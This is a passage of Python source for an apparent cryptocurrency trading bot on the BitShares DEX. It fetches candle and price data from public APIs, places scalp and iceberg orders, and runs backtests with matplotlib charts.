i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open(doc, 'r') as f:
ret = f.read()
f.close()
try:
ret = literal(ret)
except:
pass
try:
ret = ret.split(']')[0] + ']'
ret = literal(ret)
except:
pass
try:
ret = ret.split('}')[0] + '}'
ret = literal(ret)
except:
if '{' in ret:
ret = {}
else:
ret = []
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_read()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
return ret
def race_write(doc='', text=''): # Concurrent Write to File Operation
text = str(text)
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open(doc, 'w+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_write()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
def race_append(doc='', text=''): # Concurrent Append to File Operation
text = '\n' + str(time.ctime()) + ' ' + str(text) + '\n'
i = 0
while True:
time.sleep(0.05 * i ** 2)
i += 1
if i > 10:
break
try:
with open(doc, 'a+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_append()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
def watchdog():
identity = 0 # metaNODE:1, botscript:0
max_latency = 60
while 1:
try:
try:
with open('watchdog.txt', 'r') as f:
ret = f.read()
f.close()
ret = literal(ret)
response = int(ret[identity])
now = int(time.time())
latency = now-response
if identity == 0:
msg = str([response, now])
if identity == 1:
msg = str([now, response])
with open('watchdog.txt', 'w+') as f:
f.write(msg)
f.close()
msg = str(latency)
if latency > max_latency:
bell()
gmail()
msg += ' !!!!! WARNING: the other app is not responding !!!!!'
return msg
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
now = int(time.time())
with open('watchdog.txt', 'w+') as f:
f.write(str([now, now]))
f.close()
break # exit while loop
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
# CANDLES and CEX DATA
# ======================================================================
def backtest_candles(pair, start, stop, candle): # HLOCV arrays
# gather complete dataset so only one API call is required
raw = chartdata(pair, start, stop, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['unix'] = np.array(d['unix'])
d['high'] = np.array(d['high'])
d['low'] = np.array(d['low'])
d['open'] = np.array(d['open'])
d['close'] = np.array(d['close'])
# normalize high and low data
for i in range(len(d['close'])):
if d['high'][i] > 2 * d['close'][i]:
d['high'][i] = 2 * d['close'][i]
if d['low'][i] < 0.5 * d['close'][i]:
d['low'][i] = 0.5 * d['close'][i]
return d
def slice_candles(now, data): # Window backtest arrays
# window backtest_candles() data to test each candle
d = {}
for i in range(len(data['unix'])):
if now <= data['unix'][i] < (now + CANDLE):
h = []
l = []
o = []
c = []
for j in range(DEPTH):
try:
h.append(data['high'][i - j])
l.append(data['low'][i - j])
o.append(data['open'][i - j])
c.append(data['close'][i - j])
except:
print("append failed")
pass
# print close
d['high'] = np.array(h[::-1])
d['low'] = np.array(l[::-1])
d['open'] = np.array(o[::-1])
d['close'] = np.array(c[::-1])
return d
def live_candles(pair, candle, depth): # Current HLOCV arrays
# gather latest data to a given depth
now = int(time.time())
raw = chartdata(pair, (now - (depth + 10) * candle), now, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
d['volume'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['volume'].append(raw[i]['volumefrom'])
d['unix'] = np.array(d['unix'][-depth:])
d['high'] = np.array(d['high'][-depth:])
d['low'] = np.array(d['low'][-depth:])
d['open'] = np.array(d['open'][-depth:])
d['close'] = np.array(d['close'][-depth:])
d['volume'] = np.array(d['volume'][-depth:])
return d
def chartdata(pair, start, stop, period):
# before sending request on to chartdata2
# allow for altcoin/altcoin pair
# (ASSET1/BTC) / (ASSET2/BTC)
# this synthetic process can introduce abberations in dataset
# METHOD in tune_install allows for reconstruction method control
if CURRENCY in ['BTC', 'USD', 'CNY']:
return chartdata2(pair, start, stop, period)
else:
PAIR1 = ('%s_%s' % ('BTC', ASSET))
PAIR2 = ('%s_%s' % ('BTC', CURRENCY))
dataset1 = chartdata2(PAIR1, start, stop, period)
dataset2 = chartdata2(PAIR2, start, stop, period)
minlen = min(len(dataset1), len(dataset2))
dataset1 = (dataset1)[-minlen:]
dataset2 = (dataset2)[-minlen:]
#{"time","close","high","low","open","volumefrom","volumeto"}
dataset3 = []
method = METHOD
for i in range(len(dataset1)):
print(i)
d1_h = dataset1[i]['high']
d2_h = dataset2[i]['high']
d1_l = dataset1[i]['low']
d2_l = dataset2[i]['low']
d1_o = dataset1[i]['open']
d2_o = dataset2[i]['open']
d1_c = dataset1[i]['close']
d2_c = dataset2[i]['close']
time = dataset1[i]['time']
_close = d1_c/d2_c
_open = d1_o/d2_o
# in this section various methods can be entertained
# ##################################################
if method == 0: # most likely
_high = d1_h/d2_c
_low = d1_l/d2_c
if method == 1: # most unrealistic profitable
_high = d1_h/d2_l
_low = d1_l/d2_h
if method == 2:
_high = d1_h/d2_h # most conservative least profitable
_low = d1_l/d2_l
if method == 3: # halfway between 1 and 2
_high = ((d1_h+d1_c)/2) / ((d2_l+d2_c)/2)
_low = ((d1_l+d1_c)/2) / ((d2_h+d2_c)/2)
# if method == 4: # etc...
# ##################################################
_low = min(_high, _low, _open, _close)
_high = max(_high, _low, _open, _close)
volumefrom = dataset1[i]['volumefrom'] / dataset2[i]['volumefrom']
volumeto = dataset1[i]['volumeto'] / dataset2[i]['volumeto']
candle = { 'time':time,
'close':_close,
'high':_high,
'low':_low,
'open':_open,
'volumefrom':volumefrom,
'volumeto':volumeto}
dataset3.append(candle)
print(dataset1)
print('')
print(dataset2)
print('')
print(dataset3)
print('')
print(dataset1[0])
print('')
print(dataset2[0])
print('')
print(dataset3[0])
return dataset3
def chartdata2(pair, start, stop, period): # Public API cryptocompare
#{"time","close","high","low","open","volumefrom","volumeto"}
# docs at https://www.cryptocompare.com/api/
# print(('API call for chartdata %s %ss %se CANDLE %s DAYS %s' % (
# pair, start, stop, period, int((stop - start) / 86400.0))))
connected = 0
while not connected:
try:
if period in [60, 300, 900, 1800, 3600, 7200, 14400, 43200, 86400]:
uri = 'https://min-api.cryptocompare.com/data/'
if period <= 1800:
uri += 'histominute'
aggregate = period / 60.0
if 3600 <= period <= 43200:
uri += 'histohour'
aggregate = period / 3600.0
if period >= 86400:
uri += 'histoday'
aggregate = period / 86400.0
aggregate = int(aggregate)
pair_split = pair.split('_')
fsym = pair_split[1]
tsym = pair_split[0]
toTs = int(stop)
limit = int((stop - start) / float(period))
if limit > 2000:
limit = 2000
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d = clean_d1 = [i for i in d if i['close'] > 0]
if (period == 7200) and ((stop - start) / 7200.0 > 1000):
toTs -= period * len(clean_d)
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d2 = [i for i in d if i['close'] > 0]
clean_d = clean_d2 + clean_d1
clean_d = [i for i in clean_d if i['time'] > start]
print((len(clean_d),
(clean_d2[-1]['time'], clean_d1[0]['time']),
(clean_d1[0]['time'] - clean_d2[-1]['time'])))
print()
if len(clean_d):
return clean_d
else:
print('invalid period')
return None
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print (msg, 'chartdata() failed; try again...')
time.sleep(5)
pass
def currencies(): # Public API cryptocompare
try:
uri = 'https://min-api.cryptocompare.com/data/all/coinlist'
params = {}
ret = requests.get(uri, params=params).json()
print(('API currencies', len(ret['Data']),
'coins at cryptocompare'))
return ret['Data']
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('currencies() failed; skipping...')
return {}
def cryptocompare_time(): # CEX latency test
try:
# print('Cryptocompare API candle time')
uri = 'https://www.cryptocompare.com/api/data/coinsnapshot'
params = {'fsym': ASSET, 'tsym': CURRENCY}
ret = requests.get(uri, params=params).json()
timestamps = []
for i in range(len(ret['Data']['Exchanges'])):
timestamps.append(float(
ret['Data']['Exchanges'][i]['LASTUPDATE']))
cc_time = max(timestamps)
latency = time.time() - cc_time
print(('candle latency :', ('%.2f' % latency)))
return latency
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('cryptocompare_time() failed; skipping...')
return -1
def cryptocompare_last(): # CEX last price
connected = 0
while not connected:
try:
# print('Cryptocompare API last')
uri = 'https://min-api.cryptocompare.com/data/pricemultifull'
params = {'fsyms': ASSET, 'tsyms': CURRENCY}
ret = requests.get(uri, params=params).json()
raw = ret['RAW'][ASSET][CURRENCY]
price = float(raw['PRICE'])
volume = float(raw['LASTVOLUME'])
cc_time = float(raw['LASTUPDATE'])
latency = time.time() - cc_time
print(('cex_rate latency :', ('%.2f' % latency)))
connected = 1
return price, volume, latency
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('cryptocompare_last() failed; try again...')
time.sleep(5)
pass
def marketcap(): # Public API coinmarketcap
try:
asset_cap = asset_dominance = asset_rank = 0
print('API marketcap')
uri = 'https://api.coinmarketcap.com/v1/ticker/'
params = {'limit': 0}
caps = requests.get(uri, params=params).json()
asset_cap = 0
total_cap = 0
for c in caps:
if c['market_cap_usd'] is None:
cap = 0
else:
cap = float(c['market_cap_usd']) / 1000000.0
if c['symbol'] == ASSET:
asset_cap = cap
asset_rank = c['rank']
total_cap += cap
asset_dominance = 100 * asset_cap / total_cap
return asset_cap, asset_dominance, asset_rank
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print ('marketcap() failed; skip...')
return 999,999,999
# LIVE
# ======================================================================
def live_initialize(): # Begin live session
print(VERSION)
print('~====== BEGIN LIVE SESSION =====================~')
global storage
global portfolio
global info
global data
info = {}
data = {}
portfolio = {}
if STORAGE_RESET:
storage = {}
# initialize storage
storage['trades'] = 0
storage['HFT'] = False
storage['previous_v'] = SATOSHI
# initialize info
info['begin'] = int(time.time())
info['tick'] = 0
info['five_minute'] = 0
info['hour'] = 0
info['day'] = 0
info['current_time'] = info['begin']
info['completion_time'] = info['begin'] - 60
info['end'] = None
info['live'] = True
live_chart_latest()
plot_format()
def live(): # Primary live event loop
global storage
global info
live_initialize()
attempt = 0
msg = ''
while True:
plt.pause(1) # prevent inadvertent attack on API's
info['current_time'] = now = int(time.time())
print('')
print(('______________________________%s_cex %s_dex %s' %
(ASSET, BitASSET, time.ctime())))
print('')
# DEBUG LIVE SESSION
debug = 0
if debug:
print('$$$$$$$$$$$$$$$$$$')
print('WARN: DEBUG - RUNTIME: %s' % (info['current_time']-info['begin']))
print('$$$$$$$$$$$$$$$$$$')
print('')
print('WATCHDOG LATENCY:', watchdog())
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
cryptocompare_time()
live_data()
indicators()
state_machine()
hourly()
daily()
trade()
scalp()
live_chart()
plot_format()
live_plot()
time.sleep(10)
info['tick'] += 1
else:
print('')
print('RUNTIME: %s' % (info['current_time']-info['begin']))
print('')
print('WATCHDOG LATENCY:', watchdog())
print('')
# RAISE ALARM
if attempt > 2:
time_msg = datetime.fromtimestamp(
now).strftime('%H:%M')
print(
('%s FAIL @@@@@@@ ATTEMPT: %s %s' %
(msg, attempt, time_msg)))
if BELL:
bell(attempt, 432)
# GATHER AND POST PROCESS DATA
try:
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
except:
msg += 'cryptocompare_last() '
attempt += 1
continue
try:
cryptocompare_time()
except:
msg += 'cryptocompare_time() '
attempt += 1
continue
print('')
try:
live_data()
except:
msg += 'live_data() '
attempt += 1
continue
try:
indicators()
except:
msg += 'indicators() '
attempt += 1
continue
try:
state_machine()
except:
msg += 'state_machine() '
attempt += 1
continue
# LOWER FREQENCY EVENTS
check_hour = (info['current_time'] - info['begin']) / 3600.0
if check_hour > info['hour']:
try:
hourly()
info['hour'] += 1
except:
msg += 'hourly() '
attempt += 1
continue
check_day = (info['current_time'] - info['begin']) / 86400.0
if check_day > info['day']:
try:
daily()
info['day'] += 1
except:
msg += 'daily() '
attempt += 1
continue
# TRADE
try:
trade()
except:
msg += 'trade() '
attempt += 1
continue
# SCALP
try:
scalp()
except:
msg += 'scalp() '
attempt += 1
continue
# PLOT
try:
live_chart()
except:
msg += 'live_chart() '
attempt += 1
continue
try:
plot_format()
except:
msg += 'plot_format() '
attempt += 1
continue
try:
live_plot()
except:
msg += 'live_plot() '
attempt += 1
continue
# END PRIMARY TICK
msg = ''
print('tick', info['tick'])
info['tick'] += 1
info['completion_time'] = int(time.time())
attempt = 0
# DELAY NEXT TICK
if storage['HFT']:
print('HFT True')
set_timing()
else:
plt.pause(300)
def set_timing(): # Limits HFT to 1 minute interval at end of minute
now = time.time()
elapsed = now - info['begin']
minutes = math.floor(elapsed / TICK)
tick_elapsed = now - info['completion_time']
if (info['tick'] + 1) > minutes:
wait = max(0, (TICK_TIMING - (time.time() % TICK)))
print(('standard wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
elif tick_elapsed < TICK_MINIMUM:
wait = TICK_MINIMUM - tick_elapsed
print(('minimum wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
else:
print ('skip set_timing(); no wait')
drift = ((time.time() - info['begin']) - info['tick'] * TICK -
TICK_TIMING + info['begin'] % TICK)
drift_minutes = int(drift // TICK)
print(('drift: %.6f drift minutes %s' % (drift, drift_minutes)))
def live_data(): # Gather live data from public and private api
global portfolio
global data
global storage
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
dex_rate = storage['dex_rate'] = float(metaNODE['last'])
book = storage['book'] = metaNODE['book']
portfolio['currency'] = float(metaNODE['currency_balance'])
portfolio['assets'] = float(metaNODE['asset_balance'])
# orderbook and last price
book = metaNODE['book']
sbids = [('%.8f' % i) for i in book['bidp'][:3]]
sbids = sbids[::-1]
sasks = [('%.8f' % i) for i in book['askp'][:3]]
print (sbids, 'BIDS <> ASKS', sasks)
# populate 2h candles, 5m candles, and market rate
data['7200'] = live_candles(PAIR, candle=7200, depth=int(MA2 * 13))
data['300'] = live_candles(PAIR, candle=300, depth=300)
cex_rate = storage['cex_rate'] = storage['cc_last']['price']
print('')
print(('cex_rate: ', ('%.8f' % cex_rate)))
print(('dex_rate: ', ('%.8f' % dex_rate)))
print(('delta : ', ('%.8f' % (cex_rate - dex_rate))))
print('')
def scalp(): # Initiate secondary order placement
# localize data
global storage
now = int(time.time())
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
book = metaNODE['book']
ask_p = book['askp'][0]
ask_v = book['askv'][0]
bid_p = book['bidp'][0]
bid_v = book['bidv'][0]
ask_p2 = book['askp'][1]
bid_p2 = book['bidp'][1]
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
assets = portfolio['assets']
buying = storage['buying']
selling = storage['selling']
high = storage['high']
low = storage['low']
asset_ratio = storage['asset_ratio']
currency = portfolio['currency']
means = storage['means']
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
market_cross = storage['market_cross']
asset_ratio = storage['asset_ratio']
mid_market = storage['mid_market']
max_currency = storage['max_currency']
max_assets = storage['max_assets']
# define scalp support and resistance
scalp_resistance = max(high, ma3, ma4)
scalp_support = min(low, ma3, ma4)
# limit scalp ops to buying/selling window
max_scalp_support = ((1 - MIN_MARGIN) * selling) # 97% of selling
min_scalp_resistance = ((1 + MIN_MARGIN) * buying) # 103% of buying
scalp_support = min(scalp_support, max_scalp_support)
scalp_resistance = max(scalp_resistance, min_scalp_resistance)
# limit scalp ops to dex bid/ask
scalp_resistance = max(scalp_resistance, bid_p)
scalp_support = min(scalp_support, ask_p)
# adjust scalp margins if too thin
scalp_margin = (scalp_resistance - scalp_support) / scalp_support
if scalp_margin < MIN_MARGIN:
midscalp = (scalp_resistance + scalp_support)/2
scalp_resistance = (1 + MIN_MARGIN / 2) * midscalp
scalp_support = (1 - MIN_MARGIN / 2) * midscalp
# store scalp thresholds globally
storage['scalp_resistance'] = scalp_resistance
storage['scalp_support'] = scalp_support
# update portfolio assets and currency
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
currency = portfolio['currency'] = float(metaNODE['currency_balance'])
assets = portfolio['assets'] = float(metaNODE['asset_balance'])
# means to buy and percent invested
means = storage['means'] = currency / cex_rate
max_assets = storage['max_assets'] = (assets + means)
storage['max_currency'] = max_assets * cex_rate
invested = assets / max_assets
holding = storage['holding']
if holding: # primary trade() function
max_holding = 1
min_holding = 1-SCALP_FUND
else:
max_holding = SCALP_FUND
min_holding = 0
buy_qty = max(0, max_assets * (max_holding-invested))
sell_qty = max(0, max_assets * (invested - min_holding))
pieces = SCALP_PIECES
pie = []
for i in range (pieces):
pie.append(random())
total = sum(pie)
for i in range (pieces):
pie[i] = pie[i]/total
if SCALP:
print('')
print('begin scalp ops')
print('')
print('assets ', satoshi_str(assets))
print('currency ', satoshi_str(currency))
print('means ', satoshi_str(means))
print('max assets ', satoshi_str(max_assets))
print('max currency ', satoshi_str(max_currency))
print('holding ', holding)
print('max_holding ', max_holding)
print('min holding ', min_holding)
print('buy qty ', buy_qty)
print('sell_qty ', sell_qty)
print('scalp s ', satoshi_str(scalp_support))
print('scalp r ', satoshi_str(scalp_resistance))
print('pieces ', pieces, pie)
print('')
for i in range(pieces):
# SCALP BUY
print('')
qty = buy_qty*pie[i]
scalp = scalp_support - i *2*random()*SATOSHI
try:
print(('scalp buy', satoshi_str(qty), 'at', satoshi_str(scalp)))
dex_auth('buy', price=scalp, amount=qty)
except:
pass
# SCALP SELL
print('')
qty = sell_qty*pie[i]
scalp = scalp_resistance + i *2*random()*SATOSHI
try:
print(('scalp sell', satoshi_str(qty), 'at', satoshi_str(scalp)))
dex_auth('sell', price=scalp, amount=qty)
except:
pass
# Print trade pair and time
time_LOCAL = datetime.fromtimestamp(
int(time.time())).strftime('%H:%M:%S')
time_UTC = datetime.fromtimestamp(
int(time.time()) + 18000).strftime('%H:%M:%S')
print(('%.2f %s %.2f %s' % (currency, CURRENCY, assets, ASSET)))
print(('%s UTC %s' %
(time_UTC, time_LOCAL)))
print(('(buying: %.8f selling %.8f) (scalp buy %.8f, scalp sell %.8f)' %
(buying, selling, scalp_support, scalp_resistance)))
def trade(): # Initiate primary order placement
global storage
# localize data
buying = storage['buying']
selling = storage['selling']
mid_market = storage['mid_market']
market_cross = storage['market_cross']
buying_r = buying
selling_r = selling
if info['live']: # localize additional data for live session
book = storage['book']
storage['recycle_trigger'] = False
ask_p = book['askp'][0]
bid_p = book['bidp'][0]
dex_rate = storage['dex_rate']
cex_rate = storage['cex_rate']
assets = portfolio['assets']
currency = portfolio['currency']
asset_ratio = storage['asset_ratio']
means = storage['means']
invested = portfolio['percent_invested']
divested = portfolio['percent_divested']
min_order = 0.00011 / dex_rate
dex_auth('cancel')
max_assets = (MAX_ASSETS / 100.0) * (assets + (currency / dex_rate))
max_currency = (MAX_CURRENCY / 100.0) * (currency + (assets * dex_rate))
print(('assets %.1f, max assets %.1f' % (assets, max_assets)))
pieces = 10.0 # order size
if MANUAL_OVERRIDE:
storage['selling'] = selling = MANUAL_SELL
storage['buying'] = buying = MANUAL_BUY
storage['HFT'] = False
if SCALP or RECYCLE:
storage['HFT'] = True
if ORDER_TEST:
dex_auth('buy', price=0.9*dex_rate, amount=1)
dex_auth('sell', price=1.1*dex_rate, amount=1)
if dex_rate > selling:
storage['holding'] = False
if dex_rate < buying:
storage['holding'] = True
qty = max_assets / pieces
if (dex_rate > 0.90 * selling):
print('APPROACHING SELL POINT')
if BELL:
bell(0.5, 800)
if (portfolio['assets'] > 0.1):
if (divested < MAX_CURRENCY):
storage['HFT'] = True
selling_r = max(selling, (dex_rate + ask_p) / 2)
try:
# iceberg
print(
('SELLING', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('sell', price=selling_r, amount=qty)
# iceberg front limit
selling_r *= 1.0 - 0.015*random()
qty /= randint(69,99)
if random() > 0.5:
print(
('SELLING MINI', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('sell', price=selling_r, amount=qty)
except:
print('SELL FAILED')
pass
else:
print('MAX DIVESTED')
else:
print('NO ASSETS')
qty = max_assets / pieces
if dex_rate < 1.20 * buying:
print('APPROACHING BUY POINT')
if BELL:
bell(0.5, 800)
if (portfolio['currency'] > 0.1):
if (invested < MAX_ASSETS):
storage['HFT'] = True
buying_r = min(buying, (dex_rate + bid_p) / 2)
try:
print(
('BUYING', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('buy', price=buying_r, amount=qty)
buying_r *= 1.0 + 0.015*random()
qty /= randint(69,99)
if random() > 0.5:
print(
('BUYING MINI', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
dex_auth('buy', price=buying_r, amount=qty)
except:
print('buy FAIL')
pass
else:
print('MAX INVESTED')
else:
print ('NO CURRENCY')
else:
# test trade
if portfolio['currency'] > 0:
if (storage['low'][-1] < buying):
buying_r = min(storage['high'][-1], buying)
test_buy(buying_r)
elif portfolio['assets'] > 0:
if storage['high'][-1] > selling:
selling_r = max(storage['low'][-1], selling)
test_sell(selling_r)
def hourly(): # Do this every hour
now = int(time.time())
cex_rate = storage['cex_rate']
print(('hour: %s' % info['hour']))
plt.plot(now, cex_rate, markersize=5, marker='.',
color='white', label='daily')
def daily(): # Do this every day
now = int(time.time())
cex_rate = storage['cex_rate']
print(('day: %s' % info['day']))
plt.plot(now, cex_rate, markersize=10, marker='.',
color='white', label='daily')
# BACKTEST
# ======================================================================
def initialize(): # Open plot, set backtest days
global DAYS
if MODE == 0:
print('~=== OPTIMIZING 1D CANDLES =================~')
if MODE == 1:
print('~=== BEGIN BACKTEST 1D CANDLES =============~')
if MODE == 2:
print('~=== WARMING UP PAPER SESSION 2H CANDLES ===~')
if MODE == 3:
print('')
print('')
print('NOTE: THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY')
print('')
print('')
print('~=== WARMING UP LIVE MACHINE 2H CANDLES ====~')
if MODE == 4:
print('~=== BEGIN SALES BACKTEST 1D CANDLES =======~')
if MODE in [2,3]:
print('This will require a cpu core and 2.5 gigs RAM for a few minutes...')
if MODE == 6:
print('~=== BEGIN LIVE BUY/SELL/CANCEL TEST =======~')
if LIVE:
DAYS = 90
watchdog()
dex_auth('cancel')
else:
DAYS = len(chartdata(PAIR, 1390000000, int(time.time()), 86400))
if ASSET == 'BTS': # filter glitch in dataset
DAYS -= 250
if CURRENCY == 'BITCNY':
DAYS -= 200
elif ASSET == 'DASH': # filter glitch in dataset
DAYS -= 360
elif ASSET == 'NXT': # filter glitch in dataset
DAYS -= 300
else:
DAYS -= 100
if (SALES or OPTIMIZE) and (DAYS >= 365):
DAYS = 365
if LIVE or BACKTEST:
plt.ion()
fig = plt.figure()
fig.patch.set_facecolor('0.15')
fig.canvas.set_window_title(VERSION)
def holdings(): # Calculate starting portfolio
if info['tick'] == 0:
close = data['close'][-DAYS]
else:
close = storage['close'][-1]
storage['max_assets'] = (portfolio['assets'] +
(portfolio['currency'] / close))
storage['max_currency'] = (portfolio['currency'] +
(portfolio['assets'] * close))
if info['tick'] == 0:
storage['begin_max_assets'] = storage['max_assets']
storage['begin_max_currency'] = storage['max_currency']
storage['start_price'] = close
def test_initialize(): # Begin backtest session
now = int(time.time())
global storage
global portfolio
global info
global data
# initialize storage
storage['trades'] = 0
storage['buys'] = [[], []]
storage['sells'] = [[], []]
storage['holding'] = True
# initialize portfolio balances
portfolio['assets'] = float(START_ASSETS)
portfolio['currency'] = float(START_CURRENCY)
# initialize info dictionary objects
info['begin'] = now - DAYS * 86400
info['end'] = now
info['tick'] = 0
info['current_time'] = info['begin']
info['origin'] = info['begin'] - int(1.1 * MA2 * 86400)
info['live'] = False
print(('Dataset.....: %s DAYS' %
int((now - info['origin']) / 86400.0)))
print(('Backtesting.: %s DAYS' %
int((now - info['begin']) / 86400.0)))
# check for compatible interval
if CANDLE not in [300, 900, 1800, 7200, 14400, 86400]:
print(('Tick Interval must be in [300, 900,' +
'1800, 7200, 14400, 86400]'))
raise stop()
# gather complete data set for backtest
if LIVE or BACKTEST:
# print(((now - info['origin']) / float(CANDLE)))
data = backtest_candles(PAIR, info['origin'], now, CANDLE)
# print(CANDLE)
# print((len(data['unix']), (data['unix'][1] - data['unix'][0])))
# print((min(data['unix']), time.ctime(min(data['unix'])), 'mindate'))
# print((info['origin'], time.ctime(info['origin']), 'origin'))
print('')
print(('PAIR......: %s' % PAIR))
print(('BitPAIR...: %s' % BitPAIR))
print('')
print(('CANDLE....: %s' % CANDLE))
# print(('ORIGIN....: %s %s' % (info['origin'],
# time.ctime(info['origin']))))
# print(('BEGIN.....: %s %s' % (info['begin'],
# time.ctime(info['begin']))))
plot_format()
if LIVE:
test_chart_latest()
def backtest(): # Primary backtest event loop; the cost funtion
#===================================================================
''' BACKTEST EVENT LOOP '''
#===================================================================
global storage
while True:
# print(info['current_time'], 'current_time')
# print(info['end'], 'end')
if info['current_time'] < info['end']:
# print info['current_time'], time.ctime(info['current_time'])
# print (data)
# print (len(data['unix']))
# print (data)
# print (info['current_time'])
data_slice = slice_candles(info['current_time'], data)
storage['high'] = data_slice['high']
storage['low'] = data_slice['low']
storage['open'] = data_slice['open']
storage['close'] = data_slice['close']
holdings()
indicators()
state_machine()
trade()
if LIVE or BACKTEST:
test_chart()
info['current_time'] += CANDLE
info['tick'] += 1
else:
test_stop()
if LIVE or BACKTEST:
test_plot()
plt.pause(0.0001)
if BACKTEST:
plt.ioff()
try:
plot_format()
except:
pass
plt.show()
break
def test_buy(price): # Execute a backtest buy
storage['trades'] += 1
now = time.ctime(info['current_time'])
storage['buys'][0].append(info['current_time'])
storage['buys'][1].append(price)
portfolio['assets'] = portfolio['currency'] / price
storage['holding'] = True
if LIVE or BACKTEST:
plot_text()
if storage['market_cross'] is True:
call = 'BULL SUPPORT'
else:
call = 'BEAR DESPAIR'
print(('[%s] %s BUY %s %.2f %s at %s sat value %.2f %s' %
(now, storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
plt.plot(info['current_time'], (price), markersize=10,
marker='^', color='lime', label='buy')
portfolio['currency'] = 0
if LIVE:
plt.pause(0.0001)
watchdog()
def test_sell(price): # Execute a backtest sell
storage['trades'] += 1
now = info['current_time']
storage['sells'][0].append(info['current_time'])
storage['sells'][1].append(price)
portfolio['currency'] = portfolio['assets'] * price
storage['holding'] = False
if LIVE or BACKTEST:
plot_text()
plt.plot(info['current_time'], (price), markersize=10,
marker='v', color='coral', label='sell')
if storage['market_cross'] is True:
call = 'BULL OVERBOUGHT'
else:
call = 'BEAR RESISTANCE'
if storage['buys'][1][-1]:
buy_price = storage['buys'][1][-1]
buy_time = storage['buys'][0][-1]
if price > buy_price:
plt.plot((buy_time, now), (buy_price, price),
color='lime', label='win', lw=2)
else:
plt.plot((buy_time, now), (buy_price, price),
color='coral', label='loss', lw=2)
print(('[%s] %s SELL %s %.2f %s at %s sat value %.2f %s' %
(time.ctime(now), storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
portfolio['assets'] = 0
if LIVE:
plt.pause(0.0001)
watchdog()
# PLOT, PRINT, ALARM
# ======================================================================
def draw_state_machine( # Plots primary trade indications
now, selloff, support, resistance, despair,
buying, selling, min_cross, max_cross,
market_cross, ma2):
if not SALES:
if market_cross:
plt.plot((now, now), (selloff, support),
color='lime', label='state', alpha=0.2)
plt.plot((now, now), (resistance, despair),
color='darkorchid', label='state', alpha=0.2)
else:
plt.plot((now, now), (resistance, despair),
color='red', label='state', alpha=0.2)
plt.plot((now, now), (selloff, support),
color='darkorchid', label='state', alpha=0.2)
plt.plot((now, now), ((max_cross), (min_cross)),
color='white', label='cross', alpha=1.0)
plt.plot(now, (ma2), markersize=6, marker='.',
color='aqua', label='ma2')
plt.plot(now, max_cross, markersize=3, marker='.',
color='white', label='cross')
plt.plot(now, min_cross, markersize=3, marker='.',
color='white', label='cross')
# plot market extremes
plt.plot(now, selloff, markersize=3, marker='.',
color='darkorchid', label='selloff')
plt.plot(now, despair, markersize=3, marker='.',
color='darkorchid', label='despair')
plt.plot(now, resistance, markersize=3, marker='.',
color='darkorchid', label='resistance')
plt.plot(now, support, markersize=3, marker='.',
color='darkorchid', label='support')
plt.plot(now, buying, markersize=6, marker='.',
color='lime', label='buying')
plt.plot(now, selling, markersize=6, marker='.',
color='red', label='selling')
def test_rechart_orders(): # Set buy/sell markers on top
for i in range(len(storage['sells'][0])):
plt.plot(storage['sells'][0][i], (storage['sells'][1][i]),
markersize=10, marker='v', color='coral', label='sell')
for i in range(len(storage['buys'][0])):
plt.plot(storage['buys'][0][i], (storage['buys'][1][i]),
